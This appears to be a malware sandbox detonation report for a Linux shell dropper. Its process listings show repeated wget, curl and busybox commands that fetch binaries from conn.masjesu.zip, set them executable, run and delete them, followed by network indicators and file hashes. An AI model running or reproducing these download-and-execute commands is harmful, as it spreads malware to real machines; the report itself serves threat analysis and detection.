/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/chmod
[chmod 777 Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/tmp/Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM
[./Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/bin/rm
[rm Jcde8ndMiFZ24YGa556ndSn4HqMH23YXFM]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/chmod
[chmod 777 o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/tmp/o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY
[./o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/bin/rm
[rm o2vB5sjiMjJnl1Ry0eQeWDJ1q0ua7Hs3QY]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/chmod
[chmod 777 k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/tmp/k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB
[./k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/bin/rm
[rm k68TmCgt2Ka4nNUENl4pRBORSbrcgFv9IB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/chmod
[chmod 777 y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/tmp/y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi
[./y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/bin/rm
[rm y1tBhXnZxcCUteM3EpIoVdMQNyXi28giFi]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/chmod
[chmod 777 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/tmp/3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8
[./3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/bin/rm
[rm 3OQh5Kw88KSPYEfCC8433pNa70Par3xFf8]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/chmod
[chmod 777 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/tmp/8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D
[./8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/bin/rm
[rm 8qV9mYJVgFUX6boyrUvBnP2x6wO99ysl5D]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/chmod
[chmod 777 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/tmp/9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA
[./9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/bin/rm
[rm 9k44cHzSRrOEC59Z3PkDMXyRrWUhsqrHJA]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/chmod
[chmod 777 COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/tmp/COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF
[./COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
/bin/rm
[rm COLRTiBx5zF2z8KnCy7obZr8KMSMiXlWsF]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
Files
/tmp/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-25 01:07
Reported
2024-10-25 01:10
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
129s
Command Line
Signatures
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Processes
/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh
[/tmp/1ede166afe6fc2c6ba329e84225878241755c518d519bd13895ab802b96714c6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/3JXmf4muEI8msZ23DyJnv9as8qT30Vxtrg]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.1.91:443 | | tcp |
| GB | 195.181.164.14:443 | | tcp |